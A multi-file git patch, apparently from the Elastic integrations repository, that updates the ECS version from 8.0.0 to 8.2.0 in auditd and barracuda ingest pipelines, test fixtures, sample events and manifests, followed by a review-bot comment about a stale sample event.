@@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "syscall", @@ -119,7 +119,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -175,7 +175,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -243,7 +243,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -275,7 +275,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "proctitle", @@ -295,7 +295,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "proctitle", @@ -322,7 +322,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -364,7 +364,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -402,7 +402,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -437,7 +437,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", @@ -465,7 +465,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ 
@@ -497,7 +497,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -545,7 +545,7 @@ "runtime": "kvm" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -587,7 +587,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -630,7 +630,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -669,7 +669,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -712,7 +712,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -751,7 +751,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -797,7 +797,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -843,7 +843,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -889,7 +889,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -937,7 +937,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -982,7 +982,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1049,7 +1049,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1118,7 +1118,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1165,7 +1165,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1208,7 +1208,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1251,7 +1251,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1284,7 +1284,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1335,7 +1335,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ 
@@ -1386,7 +1386,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1436,7 +1436,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1481,7 +1481,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1529,7 +1529,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1573,7 +1573,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1635,7 +1635,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1705,7 +1705,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1752,7 +1752,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1786,7 +1786,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "cwd", @@ -1816,7 +1816,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "path", @@ -1840,7 +1840,7 @@ "log": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown[1329]", @@ -1870,7 +1870,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "bprm_fcaps", @@ -1890,7 +1890,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "sockaddr", @@ -1910,7 +1910,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ckaddr", @@ -1930,7 +1930,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json index 7eb8d46f426..45c95251dd6 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json 
+++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json @@ -14,7 +14,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -70,7 +70,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -125,7 +125,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -181,7 +181,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -239,7 +239,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -287,7 +287,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -343,7 +343,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -395,7 +395,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-truncated-execve.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-truncated-execve.log-expected.json index ceeb55f1d34..b61f7b166a7 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-truncated-execve.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-truncated-execve.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", @@ -36,7 +36,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", @@ -131,7 +131,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", @@ -226,7 +226,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", diff --git a/packages/auditd/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/auditd/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 53f66a34c3c..2e9667ee3d6 100644 
--- a/packages/auditd/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/auditd/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -3,7 +3,7 @@ description: Pipeline for parsing Linux auditd logs processors: - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/auditd/data_stream/log/sample_event.json b/packages/auditd/data_stream/log/sample_event.json index cc57adeb1a8..d85019365e9 100644 --- a/packages/auditd/data_stream/log/sample_event.json +++ b/packages/auditd/data_stream/log/sample_event.json @@ -19,7 +19,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/auditd/docs/README.md b/packages/auditd/docs/README.md index a7d1918ba6a..3ff78af30d6 100644 --- a/packages/auditd/docs/README.md +++ b/packages/auditd/docs/README.md @@ -38,7 +38,7 @@ An example event for `log` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/auditd/manifest.yml b/packages/auditd/manifest.yml index dea602c2bb1..43666debb31 100644 --- a/packages/auditd/manifest.yml +++ b/packages/auditd/manifest.yml @@ -1,6 +1,6 @@ name: auditd title: Auditd -version: 2.1.0 +version: 2.2.0 release: ga description: Collect logs from Linux audit daemon with Elastic Agent. type: integration From 041501de21d1ccd7ba957e39aa0372396beec0ae Mon Sep 17 00:00:00 2001 
From: Taylor Swanson Date: Tue, 22 Feb 2022 13:06:40 -0600 Subject: [PATCH 07/23] Update barracuda to ECS 8.2 --- packages/barracuda/_dev/build/build.yml | 2 +- packages/barracuda/changelog.yml | 5 + .../pipeline/test-generated.log-expected.json | 200 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../spamfirewall/sample_event.json | 2 +- .../pipeline/test-generated.log-expected.json | 200 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/waf/sample_event.json | 4 +- packages/barracuda/manifest.yml | 2 +- 9 files changed, 212 insertions(+), 207 deletions(-) diff --git a/packages/barracuda/_dev/build/build.yml b/packages/barracuda/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/barracuda/_dev/build/build.yml +++ b/packages/barracuda/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/barracuda/changelog.yml b/packages/barracuda/changelog.yml index 24bf66ee141..4cf9fa88f2d 100644 --- a/packages/barracuda/changelog.yml +++ b/packages/barracuda/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.9.0" + changes: + - description: Update to ECS 8.2.0 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.8.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json index 7d4da0e69cf..697493e060b 100644 --- a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361565502Z" 
@@ -14,7 +14,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361569329Z" @@ -26,7 +26,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361570529Z" @@ -38,7 +38,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361571721Z" @@ -50,7 +50,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361572753Z" @@ -62,7 +62,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361573772Z" @@ -74,7 +74,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361574712Z" @@ -86,7 +86,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361575670Z" @@ -98,7 +98,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361576607Z" @@ -110,7 +110,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361577549Z" @@ -122,7 +122,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361578570Z" @@ -134,7 +134,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361579751Z" @@ -146,7 +146,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361580718Z" @@ -158,7 +158,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361581686Z" @@ -170,7 +170,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361582624Z" 
@@ -182,7 +182,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361583565Z" @@ -194,7 +194,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361584711Z" @@ -206,7 +206,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361585679Z" @@ -218,7 +218,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361586643Z" @@ -230,7 +230,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361587593Z" @@ -242,7 +242,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361588531Z" @@ -254,7 +254,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361589473Z" @@ -266,7 +266,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361590399Z" @@ -278,7 +278,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361591519Z" @@ -290,7 +290,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361592459Z" @@ -302,7 +302,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361593404Z" @@ -314,7 +314,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361594346Z" @@ -326,7 +326,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361595291Z" @@ -338,7 +338,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361596263Z" 
@@ -350,7 +350,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361597225Z" @@ -362,7 +362,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361598182Z" @@ -374,7 +374,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361599134Z" @@ -386,7 +386,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361600080Z" @@ -398,7 +398,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361601018Z" @@ -410,7 +410,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361602118Z" @@ -422,7 +422,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361603131Z" @@ -434,7 +434,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361604068Z" @@ -446,7 +446,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361605014Z" @@ -458,7 +458,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361605945Z" @@ -470,7 +470,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361606917Z" @@ -482,7 +482,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361607869Z" @@ -494,7 +494,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361688315Z" @@ -506,7 +506,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361722930Z" 
@@ -518,7 +518,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361725661Z" @@ -530,7 +530,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361727053Z" @@ -542,7 +542,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361728052Z" @@ -554,7 +554,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361729089Z" @@ -566,7 +566,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361730068Z" @@ -578,7 +578,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361731044Z" @@ -590,7 +590,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361732070Z" @@ -602,7 +602,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361733219Z" @@ -614,7 +614,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361734177Z" @@ -626,7 +626,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361735114Z" @@ -638,7 +638,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361736066Z" @@ -650,7 +650,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361737020Z" @@ -662,7 +662,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361741215Z" @@ -674,7 +674,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361742249Z" 
@@ -686,7 +686,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361743231Z" @@ -698,7 +698,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361744211Z" @@ -710,7 +710,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361745168Z" @@ -722,7 +722,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361792198Z" @@ -734,7 +734,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361795559Z" @@ -746,7 +746,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361797321Z" @@ -758,7 +758,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361817089Z" @@ -770,7 +770,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361818986Z" @@ -782,7 +782,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361820077Z" @@ -794,7 +794,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361821091Z" @@ -806,7 +806,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361822059Z" @@ -818,7 +818,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361823014Z" @@ -830,7 +830,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361824315Z" @@ -842,7 +842,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361825279Z" 
@@ -854,7 +854,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361826354Z" @@ -866,7 +866,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361827298Z" @@ -878,7 +878,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361828249Z" @@ -890,7 +890,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361829553Z" @@ -902,7 +902,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361830537Z" @@ -914,7 +914,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361831513Z" @@ -926,7 +926,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361832483Z" @@ -938,7 +938,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361833441Z" @@ -950,7 +950,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361834383Z" @@ -962,7 +962,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361835393Z" @@ -974,7 +974,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361836382Z" @@ -986,7 +986,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361837316Z" @@ -998,7 +998,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361838269Z" @@ -1010,7 +1010,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361839233Z" 
@@ -1022,7 +1022,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361840212Z" @@ -1034,7 +1034,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361841159Z" @@ -1046,7 +1046,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361842186Z" @@ -1058,7 +1058,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361843187Z" @@ -1070,7 +1070,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361844147Z" @@ -1082,7 +1082,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361845079Z" @@ -1094,7 +1094,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361846118Z" @@ -1106,7 +1106,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361847068Z" @@ -1118,7 +1118,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361848014Z" @@ -1130,7 +1130,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361849083Z" @@ -1142,7 +1142,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361850035Z" @@ -1154,7 +1154,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361851031Z" @@ -1166,7 +1166,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.362046275Z" @@ -1178,7 +1178,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.362049328Z" 
@@ -1190,7 +1190,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.362050532Z" diff --git a/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml b/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml index 7aacfed138f..1866136294a 100644 --- a/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml +++ b/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/barracuda/data_stream/spamfirewall/sample_event.json b/packages/barracuda/data_stream/spamfirewall/sample_event.json index 9ddce9b0791..af43a5d2b9e 100644 --- a/packages/barracuda/data_stream/spamfirewall/sample_event.json +++ b/packages/barracuda/data_stream/spamfirewall/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json index 8c88eca0147..9475ba22fe1 100644 --- a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417884657Z" @@ -14,7 +14,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417887946Z" 
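Review bot: In packages/barracuda/data_stream/spamfirewall/sample_event.json the old value was `"version": "1.12.0"`, while the package's pipeline and test fixtures were already at `8.0.0`. That suggests this sample was not regenerated at the previous ECS bump. Editing only the version string to `"8.2.0"` may leave the rest of the sample describing output from an older pipeline; the remainder of the object is outside the hunk, so this cannot be confirmed here. Regenerating the file from a system test run would keep it in step with `default.yml`, which matters because the sample events are what users read when writing queries and detections.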
